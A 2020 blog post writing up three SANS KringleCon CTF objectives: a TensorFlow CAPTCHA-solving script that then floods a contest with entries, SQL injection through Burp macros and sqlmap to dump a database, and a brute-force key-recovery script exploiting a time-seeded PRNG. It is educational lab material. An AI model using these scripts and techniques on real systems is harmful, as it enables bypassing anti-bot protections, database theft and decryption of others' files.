Monday, January 13, 2020

SANS Holiday Hack Challenge: KringleCon 2019

This was the first year I participated in Kringlecon, and I was really impressed with how well made it was. With a variety of challenges exploring different aspects of information security, both in the realm of penetration testing and blue team techniques, and a range of difficulties, it made for a CTF event that was accessible to all. Paired with really great resources and materials for each challenge, the whole event was excellent.



Originally due to the bustle of the holidays and closing out the year, I didn't plan on participating, but a friend asked for some help on one of the challenges, and after that I couldn't stop--I was hooked and had to keep solving.

While this blog entry doesn't contain a full write-up of all the great challenges, this is only a few of the more complicated ones which I enjoyed the most.

Objective 8 - Machines can also learn to be an Elf - Machine Learning to Bypass a CAPTCHA


I loved this challenge as it taught me something genuinely new as my knowledge about machine learning was extremely limited.

We need to submit our entry for the chance to win some free cookies, but we are presented with a CAPTCHA that asks to identify three different kind of items in a time frame of 5 seconds, which, is not humanly possible.



Enter machine learning and TensorFlow! The following resources were provided to give a bit of knowledge on this topic: 


Additionally, the challenge gives us an archive of 12,000 images, separated into categories of the different types of images, as well as a Python-based script to get us started. All the tools and necessary things are provided, it's just up to us to perform the machine training and code up the logic to handle everything to bypass the actual CAPTCHA.

First, we need to use the "retrain.py" script included in the Github repo to train the machine to recognize each of the different categories of images. To do this, we just point the script to the directory that contains all 12,000 images and let it run. Output will look similar to the following:



Next, I modified some of the code in the repo so I could just import it as a library, and then added and modified code in the half-completed script that was provided, which will quickly save all the CAPTCHA images generated to a directory, and then calls the library to analyze and predict what each image should be.

Poketrainer.py
#!/usr/bin/python3
# Image Recognition Using Tensorflow Exmaple.
# Code based on example at:
# https://raw.githubusercontent.com/tensorflow/tensorflow/master/tensorflow/examples/label_image/label_image.py
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
tf.logging.set_verbosity(tf.logging.ERROR)
import numpy as np
import threading
import queue
import time
import sys
# sudo apt install python3-pip
# sudo python3 -m pip install --upgrade pip
# sudo python3 -m pip install --upgrade setuptools
# sudo python3 -m pip install --upgrade tensorflow==1.15
def load_labels(label_file):
label = []
proto_as_ascii_lines = tf.gfile.GFile(label_file).readlines()
for l in proto_as_ascii_lines:
label.append(l.rstrip())
return label
def predict_image(q, sess, graph, image_bytes, img_full_path, labels, input_operation, output_operation):
image = read_tensor_from_image_bytes(image_bytes)
results = sess.run(output_operation.outputs[0], {
input_operation.outputs[0]: image
})
results = np.squeeze(results)
prediction = results.argsort()[-5:][::-1][0]
q.put( {'img_full_path':img_full_path, 'prediction':labels[prediction].title(), 'percent':results[prediction]} )
def load_graph(model_file):
graph = tf.Graph()
graph_def = tf.GraphDef()
with open(model_file, "rb") as f:
graph_def.ParseFromString(f.read())
with graph.as_default():
tf.import_graph_def(graph_def)
return graph
def read_tensor_from_image_bytes(imagebytes, input_height=299, input_width=299, input_mean=0, input_std=255):
image_reader = tf.image.decode_png( imagebytes, channels=3, name="png_reader")
float_caster = tf.cast(image_reader, tf.float32)
dims_expander = tf.expand_dims(float_caster, 0)
resized = tf.image.resize_bilinear(dims_expander, [input_height, input_width])
normalized = tf.divide(tf.subtract(resized, [input_mean]), [input_std])
sess = tf.compat.v1.Session()
result = sess.run(normalized)
return result
def predict(requested_type):
# Loading the Trained Machine Learning Model created from running retrain.py on the training_images directory
graph = load_graph('/tmp/retrain_tmp/output_graph.pb')
labels = load_labels("/tmp/retrain_tmp/output_labels.txt")
# Load up our session
input_operation = graph.get_operation_by_name("import/Placeholder")
output_operation = graph.get_operation_by_name("import/final_result")
sess = tf.compat.v1.Session(graph=graph)
# Can use queues and threading to spead up the processing
q = queue.Queue()
unknown_images_dir = 'unknown_images'
unknown_images = os.listdir(unknown_images_dir)
#Going to interate over each of our images.
for image in unknown_images:
img_full_path = '{}/{}'.format(unknown_images_dir, image)
print('Processing Image {}'.format(img_full_path))
# We don't want to process too many images at once. 10 threads max
while len(threading.enumerate()) > 10:
time.sleep(0.0001)
#predict_image function is expecting png image bytes so we read image as 'rb' to get a bytes object
image_bytes = open(img_full_path,'rb').read()
threading.Thread(target=predict_image, args=(q, sess, graph, image_bytes, img_full_path, labels, input_operation, output_operation)).start()
print('Waiting For Threads to Finish...')
while q.qsize() < len(unknown_images):
time.sleep(0.001)
#getting a list of all threads returned results
prediction_results = [q.get() for x in range(q.qsize())]
#do something with our results... Like print them to the screen.
the_types = requested_type
final_answers = []
for prediction in prediction_results:
result = '{img_full_path}'.format(**prediction)
the_prediction = '{prediction}'.format(**prediction)
if the_prediction in the_types:
final_answers.append(result[15:51])
print(final_answers)
return final_answers
view raw poketrainer.py hosted with ❤ by GitHub


capteha_api.py
#!/usr/bin/env python3
# Fridosleigh.com CAPTEHA API - Made by Krampus Hollyfeld
import requests
import json
import sys
import base64
import poketrainer
def main():
yourREALemailAddress = "REAL EMAIL ADDRESS HERE"
# Creating a session to handle cookies
s = requests.Session()
url = "https://fridosleigh.com/"
json_resp = json.loads(s.get("{}api/capteha/request".format(url)).text)
b64_images = json_resp['images'] # A list of dictionaries eaching containing the keys 'base64' and 'uuid'
challenge_image_type = json_resp['select_type'].split(',') # The Image types the CAPTEHA Challenge is looking for.
challenge_image_types = [challenge_image_type[0].strip(), challenge_image_type[1].strip(), challenge_image_type[2].replace(' and ','').strip()] # cleaning and formatting
print(challenge_image_types)
#Logic for determining images
for mystery in b64_images:
f = open('unknown_images/'+ mystery['uuid']+'.png', 'wb+')
f.write(base64.b64decode(mystery['base64']))
correct_answers = poketrainer.predict(challenge_image_types)
print(correct_answers)
final_answer = ','.join(correct_answers)
json_resp = json.loads(s.post("{}api/capteha/submit".format(url), data={'answer':final_answer}).text)
if not json_resp['request']:
# If it fails just run again. ML might get one wrong occasionally
print('FAILED MACHINE LEARNING GUESS')
print('--------------------\nOur ML Guess:\n--------------------\n{}'.format(final_answer))
print('--------------------\nServer Response:\n--------------------\n{}'.format(json_resp['data']))
sys.exit(1)
print('CAPTEHA Solved!')
# If we get to here, we are successful and can submit a bunch of entries till we win
userinfo = {
'name':'Krampus Hollyfeld',
'email':yourREALemailAddress,
'age':180,
'about':"Cause they're so flippin yummy!",
'favorites':'thickmints'
}
# If we win the once-per minute drawing, it will tell us we were emailed.
# Should be no more than 200 times before we win. If more, somethings wrong.
entry_response = ''
entry_count = 1
while yourREALemailAddress not in entry_response and entry_count < 200:
print('Submitting lots of entries until we win the contest! Entry #{}'.format(entry_count))
entry_response = s.post("{}api/entry".format(url), data=userinfo).text
entry_count += 1
print(entry_response)
if __name__ == "__main__":
main()
view raw capteha_api.py hosted with ❤ by GitHub


All of the UUIDs of the predicted images are stored in a list and then submitted as a POST request for the CAPTCHA solution. Naturally, I could have likely made major improvements to this script to enhance the speed I suppose, but this ended up working nicely. 


An email is sent to the address you add to the script which gives the flag:


Objective 9 - Sleighing the DB Blind  - SQL Injection to Retrieve the Datas



Based on the objective text, it's quite obvious SQL injection is going to be the key here. We're presented with a web page that contains a form to submit university applications.



However, looking at the requests that take place, before every request is made to the backend, the "validator.php" file is called and a unique time-based token is generated which must be used immediately. Due to this, we need to ensure that this is generated and placed into our SQL injection payload so the request is processed.





There are two ways to do this: using a custom sqlmap tamper script or by using Burp Suite macros. I decided to just let Burp handle everything, but in either case, we are going to let sqlmap do all the heavy lifting after all is said and done.

First, I confirmed that SQL injection was possible by sending some apostrophes in the form data.





This error shows us that input placed into the name field is not sanitized and used as-is, which means we can insert arbitrary SQL queries. Now we just need to set up a Burp macro and session handling rule so we can process this through sqlmap. This is accomplished via the following steps:

Project options > Sessions tab  > Macros > Add

From within the Macro Editor, the request to validator.php can be selected from the proxy history.


The Configure Item option can then be selected, and a custom parameter can be defined.


Back in the Sessions tab under Session Handling Rules, a new rule can be added, and the rule can be set to run the macro that was just created.


The options when selecting the macro should look like the following:


The scope of this rule can then be modified to include the proxy.



Now all that needs to be done is to point sqlmap to the Burp proxy, and the token generation will be handled automagically allowing for our sqlmap payloads to get through.



Allowing this to run, we can dump the entire database and we discover the "krampus" table which contained various "path" values indicating PNG images.




Browsing to these PNGs gives the answer to the objective: Super Sled-o-matic









Objective 10 - Elfscrow Inside and Out: Reversing and Crypto




The objective provides a Windows binary, a PDB file, and an encrypted PDF file. The goal is to analyze the binary and determine how to break the cryptography. The following resource was given, and it was very well made to learn more on this topic:


To start off, I explored the executable by running it to determine its use.




There is an insecure mode with some text hinting at insecurities, and it appears we need an ID in order to perform the decryption. As a test, I tried to encrypt a file.



The output gives a seed value, a key, and an ID. After this, I loaded the binary and the PDB into IDA to explore what is happening. From the main function we have paths to both the encrypt and decrypt functions, and exploring the "do_decrypt" function we can see that it starts by performing an internet connection check, and reaches out to the server to try and grab it. We'll come back to this, but the more important aspect is how this file is getting encrypted.



Following the "do_encrypt" function, we can see that the seed is being generated based on the time function, which is going to grab an epoch time value based on our system time. 


Following this further to the super_secure_random, this shows us exactly how the key value is being generated. It is taking the state, which is our seed (epoch time value), multiplies it by 214013, adds 2531011, performs a bitwise shift, and then performs a bitwise AND operation. Using this, we can generate our own key if we know the seed.


Looking at other functions present, we can also see two different API calls being made. When encrypting, a call to "/api/store" is made, which will store the encryption key on the remote server.


Additionally, when decrypting, a call to "/api/retrieve" will be made, which uses the ID value in order to retrieve a stored encryption key from the server.




Capturing the traffic with Wireshark you can see that this is only storing and retrieving the key, and the ID is really not necessary at all to perform the decryption. 

As mentioned previously, the seed is being generated via an epoch time stamp. Since the objective text provides a clue that the encryption took place between a certain time, it will be possible to brute force the decryption by creating keys for that entire time range.

I decided to put together a script that would loop through the time range generating keys, and then use the binary to do the heavy lifting for the decryption; however, as seen by the output, it requires an ID not a key. My initial thought process was to use the generated key, make an API call to store it, and then it would return an ID I could use as an argument to decrypt; however, I noticed that this was generating a lot of false positives as well as other issues.

Crypto-wise, I knew it didn't really need the ID to decrypt, but there was that internet check. If the internet was not up, it would terminate the binary. To overcome this and speed up the decryption process, I decided to spin up a local Python-server listening on localhost, and modified my hosts file so any requests to the actual API would hit my server instead. The Python server would only just reflect whatever was sent to it, so it bypassed the internet check and proceeded to decrypt based on the key that was reflected back.

The following is the script used for the decryption:
import requests
import os
import binascii
import subprocess
import re
store = "http://127.0.0.1/api/store"
retrieve = "http://127.0.01/api/retrieve"
seed_start = 1575658800
seed_stop = 1575666001
def generate_key(seed):
state = seed
key = ""
for i in range(8):
state = 214013 * state + 2531011
iter = (state>>16) & 0x7FFF
part = hex(iter & 0xFF).replace('0x','')
key += "{num:0>2}".format(num = part)
print(key)
return key
def store_key(url,key):
useragent = {"User-Agent":"Elfscrow 1.0 (SantaBrowse Compatible)"}
r = requests.post(store,data=key,headers=useragent)
id = r.content
return id
def retrieve_key(url,id):
useragent = {"User-Agent":"Elfscrow 1.0 (SantaBrowse Compatible)"}
r = requests.post(retrieve,data=id,headers=useragent)
key = r.content
return key
def exec_cmd(cmd):
ps = subprocess.Popen(cmd,shell=True,stdout=subprocess.PIPE,stderr=subprocess.STDOUT)
output = ps.communicate()[0]
print(output)
return str(output)
def main():
attempt = 0
for i in range(seed_start,seed_stop,1):
print("------Attempt ", attempt, "--------")
possible_key = generate_key(i)
print("Time: ", i)
print("Key: ", possible_key)
possible_id = store_key(store,possible_key)
print("ID: ",possible_id.decode('utf-8'))
attempt += 1
cmd = f"elfscrow.exe --decrypt --id {possible_id.decode('utf-8')} ElfUResearchLabsSuperSledOMaticQuickStartGuideV1.2.pdf.enc {possible_id.decode('utf-8')}.pdf --insecure"
print(cmd)
decrypt = exec_cmd(cmd)
if "Uh oh" in decrypt:
continue
else:
print("Valid ID discovered! - ", possible_id.decode('utf-8'))
continue
if __name__ == "__main__":
main()


Example Python server to respond to the API requests:
from http.server import HTTPServer, BaseHTTPRequestHandler
from io import BytesIO
class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.end_headers()
self.wfile.write(b'Hello, world!')
def do_POST(self):
content_length = int(self.headers['Content-Length'])
body = self.rfile.read(content_length)
self.send_response(200)
self.end_headers()
response = BytesIO()
response.write(body)
self.wfile.write(response.getvalue())
httpd = HTTPServer(('localhost', 80), SimpleHTTPRequestHandler)
httpd.serve_forever()


Running this, it takes a slight bit and there were a lot of false positive decryptions. However, setting up a monitoring script or just using the "file" command to keep an eye on things, eventually we find a valid decryption took place. Corrupted files are determined to just be "data", while our valid decryption is showing to be an actual PDF file.



Now we know that the file was encrypted on Friday, December 6, 2019 at 8:20:49 PM GMT.

Opening up the decrypted PDF, we find the answer to the objective:













0 comments:

Post a Comment

Note: Only a member of this blog may post a comment.

Powered by Blogger.